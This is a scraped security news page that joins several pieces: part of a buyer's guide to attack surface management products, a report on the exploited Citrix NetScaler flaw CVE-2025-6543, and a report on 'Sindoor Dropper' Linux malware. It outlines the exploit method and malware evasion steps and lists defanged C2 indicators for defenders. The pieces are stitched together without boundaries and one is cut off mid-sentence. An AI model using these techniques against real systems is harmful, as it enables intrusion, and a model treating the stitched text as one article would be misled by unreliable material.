The platform’s key strength lies in its ability to provide a complete and accurate inventory of an organization’s digital assets, including those that are “shadow IT,” which traditional tools often miss.
Why You Want to Buy It:
Cortex Xpanse provides unparalleled visibility into the external attack surface. It’s highly effective at finding unmanaged and unknown assets, which is a critical first step in a proactive security program.
Feature
Yes/No
Specification
Continuous Discovery
Yes
Actively probes the internet to discover assets.
Attacker-Centric View
Yes
Finds exposures from a hacker’s perspective.
Risk Prioritization
Yes
Prioritizes issues with contextual risk scoring.
Integration
Yes
Integrates with other Cortex products and third-party tools.
Best For: Large enterprises that need a robust, comprehensive, and automated solution for discovering and managing their external attack surface.
CrowdStrike Falcon Surface is a key component of the broader Falcon platform, offering a unified approach to managing an organization’s attack surface.
The solution provides a real-time, adversary-driven view of external risks, identifying exposed assets and prioritizing them based on active threats.
Its seamless integration with the CrowdStrike Falcon platform allows security teams to correlate external risks with internal data, providing a holistic view of the attack surface.
Why You Want to Buy It:
CrowdStrike’s unified platform approach is a major advantage.
It allows security teams to consolidate tools, reduce complexity, and leverage the same lightweight agent and console for both internal and external security, making it highly efficient.
Feature
Yes/No
Specification
Continuous Discovery
Yes
Real-time discovery of external-facing assets.
Attacker-Centric View
Yes
Provides an adversary-driven perspective on risks.
Risk Prioritization
Yes
Prioritizes vulnerabilities based on threat intelligence.
Integration
Yes
Deeply integrated with the Falcon platform.
Best For: Companies that already use CrowdStrike for endpoint security and want to extend that same level of visibility and control to their external attack surface.
Mandiant, now part of Google Cloud, brings its world-class threat intelligence and incident response expertise to its Attack Surface Management platform.
Mandiant Advantage ASM provides continuous monitoring of the external ecosystem, using Mandiant’s frontline intelligence to identify exploitable exposures.
The platform’s ability to perform “active checks” that are benign but simulate attacker reconnaissance gives security teams a powerful way to validate risks with real-world context.
Why You Want to Buy It:
The combination of an ASM platform with Mandiant’s extensive threat intelligence and frontline incident response data is a game-changer.
Feature
Yes/No
Specification
Continuous Discovery
Yes
Continuously monitors the external ecosystem.
Attacker-Centric View
Yes
Uses Mandiant’s intelligence for active checks.
Risk Prioritization
Yes
Prioritizes risks based on real-world exploitability.
Integration
Yes
Seamlessly integrates with Google Cloud Security.
Best For: Organizations that need a solution backed by world-class threat intelligence and a team of experts with deep knowledge of real-world attacker tactics.
IBM Randori takes an attacker’s perspective to a new level by offering an “automated red team.”
The platform continuously maps an organization’s external attack surface and uses sophisticated techniques to identify and test for exploitable entry points.
By simulating the actions of a real attacker, IBM Randori helps security teams discover blind spots and prioritize the most tempting targets for an adversary, providing an objective measure of cyber risk.
Why You Want to Buy It:
The automated red teaming feature is a unique value proposition.
Instead of just identifying vulnerabilities, it actively tests them in a safe and controlled manner, giving security teams definitive proof of an exposure and its potential impact.
Feature
Yes/No
Specification
Continuous Discovery
Yes
Continuously maps exposed assets.
Attacker-Centric View
Yes
Simulates attacker reconnaissance and testing.
Risk Prioritization
Yes
Ranks risks based on “adversarial temptation.”
Integration
Yes
Integrates with the broader IBM Security portfolio.
Best For: Enterprises that want to continuously test their security defenses with an automated red team simulation to find and fix critical exposures.
Qualys CSAM is a core component of the Qualys Cloud Platform, providing a centralized and continuous view of both internal and external assets.
It goes beyond traditional vulnerability management by providing a comprehensive, single-pane-of-glass dashboard for all IT and security assets.
The platform automatically discovers all assets in the environment, classifies them, and provides a risk score based on their criticality and potential vulnerabilities.
Why You Want to Buy It:
Qualys’ single-agent, cloud-native platform simplifies asset management and vulnerability assessment across hybrid environments. It provides a highly effective way to gain visibility and manage risk from a single console.
Feature
Yes/No
Specification
Continuous Discovery
Yes
Discovers and inventories all IT and security assets.
Attacker-Centric View
Yes
Provides a holistic view of external risks.
Risk Prioritization
Yes
Uses Qualys’ threat intelligence to score risks.
Integration
Yes
Deep integration within the Qualys Cloud Platform.
Best For: Organizations that already use Qualys for vulnerability management and want to extend that capability to a full-fledged ASM program.
Tenable ASM (formerly Tenable.io) is a powerful EASM solution that provides a comprehensive view of an organization’s public-facing attack surface.
The platform continuously scans the internet to discover, analyze, and monitor internet-facing assets.
It is a key part of Tenable’s broader Exposure Management platform, allowing security teams to correlate external risks with internal vulnerabilities for a more complete picture of their security posture.
Why You Want to Buy It:
Tenable’s long-standing expertise in vulnerability management makes its ASM solution highly effective.
It provides a seamless transition from external discovery to internal vulnerability scanning and remediation, simplifying the entire risk management lifecycle.
Feature
Yes/No
Specification
Continuous Discovery
Yes
Maps all internet-facing devices and services.
Attacker-Centric View
Yes
Provides an external view of risk.
Risk Prioritization
Yes
Leverages Tenable’s vulnerability intelligence.
Integration
Yes
Integrates with Tenable.io for a unified view.
Best For: Security teams that need a dedicated and highly effective EASM solution with deep integration into their vulnerability management program.
Rapid7 ASM is a key offering within the company’s Insight Platform, providing a unified view of an organization’s external attack surface.
The platform continuously discovers and monitors external assets, identifying misconfigurations, exposed services, and other vulnerabilities.
By correlating this external data with internal telemetry from other Rapid7 solutions, ASM provides a comprehensive view of risk and helps teams prioritize remediation based on real-world threat intelligence.
Why You Want to Buy It:
Rapid7’s Insight Platform provides a powerful synergy between its different products.
The ability to correlate external ASM findings with internal vulnerability and threat data is a major advantage, allowing security teams to make more informed decisions and respond faster.
Feature
Yes/No
Specification
Continuous Discovery
Yes
Discovers and inventories all external assets.
Attacker-Centric View
Yes
Provides an external view of risk.
Risk Prioritization
Yes
Uses Rapid7 Labs intelligence for prioritization.
Integration
Yes
Deeply integrated into the Insight Platform.
Best For: Organizations that want a unified platform for vulnerability management, detection and response, and external attack surface management.
CyCognito provides a leading EASM platform that uses a unique graph database and AI to discover and prioritize external risks.
It automates the work of a security analyst, continuously scanning the internet to find assets associated with a company and its third parties.
The platform’s ability to automatically prioritize risks based on their exploitability and business context makes it a highly effective solution for managing a sprawling, complex attack surface.
Why You Want to Buy It:
CyCognito’s AI-driven approach to risk prioritization is a key differentiator.
It automates the discovery and analysis process, allowing security teams to focus on fixing the most critical issues rather than spending time on manual reconnaissance and investigation.
Feature
Yes/No
Specification
Continuous Discovery
Yes
Automatically maps a company’s attack surface.
Attacker-Centric View
Yes
Uses a graph database to simulate attacker paths.
Risk Prioritization
Yes
Prioritizes risks based on exploitability.
Integration
Yes
Integrates with SIEM, ticketing, and other tools.
Best For: Companies with a complex, global footprint that need to find and prioritize risks with minimal manual effort.
FireCompass takes a unique approach to ASM by combining it with a Continuous Automated Red Teaming (CART) solution.
The platform not only discovers an organization’s digital footprint but also automatically launches simulated attacks to test its defenses.
This provides security teams with a clear, objective measure of their security posture and helps them identify and fix exploitable vulnerabilities before attackers can.
Why You Want to Buy It:
FireCompass’s CART solution is its key selling point. It provides a dynamic and proactive security posture, ensuring that an organization’s defenses are continuously challenged and improved in a real-world context.
Feature
Yes/No
Specification
Continuous Discovery
Yes
Discovers assets from an attacker’s perspective.
Attacker-Centric View
Yes
Actively probes and attacks the surface.
Risk Prioritization
Yes
Prioritizes based on real-world attack simulations.
Integration
Yes
Integrates with SIEM, ticketing, and other tools.
Best For: Organizations that want to go beyond simple asset discovery and continuously test their defenses with automated red team exercises.
In 2025, an effective attack surface management solution is no longer a luxury it’s a necessity.
The top solutions on this list have moved beyond basic asset inventory to provide intelligent, attacker-centric, and automated capabilities that are critical for defending against modern threats.
For organizations that are already in the Microsoft or CrowdStrike ecosystems, Microsoft Defender External ASM and CrowdStrike Falcon Surface offer seamless integration and a unified platform.
For those looking for best-of-breed, highly specialized EASM, Palo Alto Cortex Xpanse and CyCognito provide unparalleled discovery and risk prioritization.
Companies that want to take a more aggressive, proactive approach will find value in the automated red teaming offered by IBM Randori and FireCompass.
Ultimately, the right solution depends on your organization’s specific needs, existing technology stack, and security maturity.
A sophisticated voice phishing operation has emerged as a significant threat to organizations worldwide, with cybercriminals successfully infiltrating Salesforce environments to steal sensitive data and demand ransom payments. Google’s Threat Intelligence Group has identified this financially motivated campaign, designating the primary threat cluster as UNC6040, which has demonstrated alarming success in breaching corporate networks through […]
Cybersecurity researchers have called attention to a cyber attack in which unknown threat actors deployed an open-source endpoint monitoring and digital forensic tool called Velociraptor, illustrating ongoing abuse of legitimate software for malicious purposes.
“In this incident, the threat actor used the tool to download and execute Visual Studio Code with the likely intention of creating a
A critical zero-day vulnerability in Citrix NetScaler products, identified as CVE-2025-6543, has been actively exploited by threat actors since at least May 2025, months before a patch was made available.
While Citrix initially downplayed the flaw as a “memory overflow vulnerability leading to unintended control flow and Denial of Service,” it has since been revealed to allow for unauthenticated remote code execution (RCE), leading to widespread compromise of government and legal services worldwide.
In late June 2025, Citrix released a patch for CVE-2025-6543. However, by that time, attackers had already been leveraging the vulnerability for weeks.
The exploit was used to infiltrate NetScaler remote access systems, deploy webshells to ensure persistent access even after patching, and steal credentials.
Evidence suggests that Citrix was aware of the severity and the ongoing exploitation but failed to disclose the full extent of the threat to its customers, Kevin Beaumont said.
The company provided a script to check for compromise only upon request and under restrictive conditions, without fully explaining the situation or the script’s limitations.
The Dutch National Cyber Security Centre (NCSC) has played a pivotal role in exposing the true nature of the attacks. Their investigation confirmed that the vulnerability was exploited as a zero-day and that attackers actively covered their tracks, making forensic analysis challenging.
The NCSC’s report, released in August 2025, stated that “several critical organizations within the Netherlands have been successfully attacked” and that the vulnerability was abused since at least early May.
How the Exploit Works
The same sophisticated threat actor is also believed to be behind the exploitation of another zero-day, CVE-2025–5777, also known as CitrixBleed 2, which was used to steal user sessions.
Investigations are ongoing to determine if this actor is also responsible for exploiting a more recent vulnerability, CVE-2025-7775.
The CVE-2025–6543 vulnerability allows an attacker to overwrite system memory by supplying a malicious client certificate to the /cgi/api/login endpoint on a vulnerable NetScaler device.
By sending hundreds of these requests, an attacker can overwrite enough memory to execute arbitrary code on the system. This method gives them a foothold in the network, which they have used to move laterally into Active Directory environments by misusing stolen LDAP service account credentials.
Security professionals urge all organizations using internet-facing Citrix NetScaler devices to take immediate action.
System administrators should check for signs of compromise, which include looking for large POST requests to /cgi/api/login in web access logs, often in quick succession.
A corresponding NetScaler log error code of 1245184, indicating an invalid client certificate, is a strong indicator of an exploitation attempt.
The NCSC has released scripts on GitHub to help organizations check for compromise on live hosts and in coredump files.
If a system is believed to be compromised, the recommended steps are:
Immediately take the NetScaler device offline.
Image the system for forensic analysis.
Change the LDAP service account credentials to prevent lateral movement.
Deploy a new, patched NetScaler instance with fresh credentials.
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added CVE-2025-6543 to its Known Exploited Vulnerabilities (KEV) catalog, underscoring the urgency for organizations to apply patches and hunt for signs of malicious activity.
Find this Story Interesting! Follow us on Google News, LinkedIn, and X to Get More Instant Updates.
A new malware campaign, dubbed “Sindoor Dropper,” is targeting Linux systems using sophisticated spear-phishing techniques and a multi-stage infection chain.
The campaign leverages lures themed around the recent India-Pakistan conflict, known as Operation Sindoor, to entice victims into executing malicious files.
This activity’s standout feature is its reliance on weaponized .desktop files, a method previously associated with the advanced persistent threat (APT) group APT36, also known as Transparent Tribe or Mythic Leopard.
The attack begins when a user opens a malicious .desktop file, named “Note_Warfare_Ops_Sindoor.pdf.desktop,” which masquerades as a standard PDF document.
According to Nextron system analysis, upon execution, it opens a benign decoy PDF to maintain the illusion of legitimacy while silently initiating a complex, heavily obfuscated infection process in the background.
‘Sindoor Dropper’ Malware Targets Linux Systems
This process is designed to evade both static and dynamic analysis, with the initial payload reportedly having zero detections on VirusTotal at the time of its discovery.
‘Sindoor Dropper’ Malware Targets Linux Systems
The .desktop file downloads several components, including an AES decryptor (mayuw) and an encrypted downloader (shjdfhd).
The decryptor, a Go binary packed with UPX, is intentionally corrupted by stripping its ELF magic bytes, likely to bypass security scans on platforms like Google Docs. The .desktop file restores these bytes on the victim’s machine to make the binary executable again.
This kicks off a multi-stage process where each component decrypts and runs the next. The chain includes basic anti-virtual machine checks, such as verifying board and vendor names, blacklisting specific MAC address prefixes, and checking machine uptime.
All strings within the droppers are obfuscated using a combination of Base64 encoding and DES-CBC encryption to further hinder analysis.
The final payload is a repurposed version of MeshAgent, a legitimate open-source remote administration tool. Once deployed, MeshAgent connects to a command-and-control (C2) server hosted on an Amazon Web Services (AWS) EC2 instance at wss://boss-servers.gov.in.indianbosssystems.ddns[.]net:443/agent.ashx.
This gives the attacker full remote access to the compromised system, enabling them to monitor user activity, move laterally across the network, and exfiltrate sensitive data, Nextron said.
The Sindoor Dropper campaign highlights an evolution in threat actor tradecraft, demonstrating a clear focus on Linux environments, which phishing campaigns have less targeted.
Command-and-control (C2) server URL for the MeshAgent payload
Network
indianbosssystems.ddns[.]net
Malicious C2 domain
Network
54.144.107[.]42
IP address of the C2 server, hosted on AWS
By combining timely, region-specific social engineering with advanced evasion techniques, the attackers increase their likelihood of successfully compromising sensitive networks.
Find this Story Interesting! Follow us on Google News, LinkedIn, and X to Get More Instant Updates.
Yes
No.webp)
.webp)
.webp)
.webp)
.webp)
.webp)
.webp)
.webp)
.webp)
.webp)
.webp)
.webp)
.webp)
.webp)
.webp)
.webp)
.webp)
.webp)
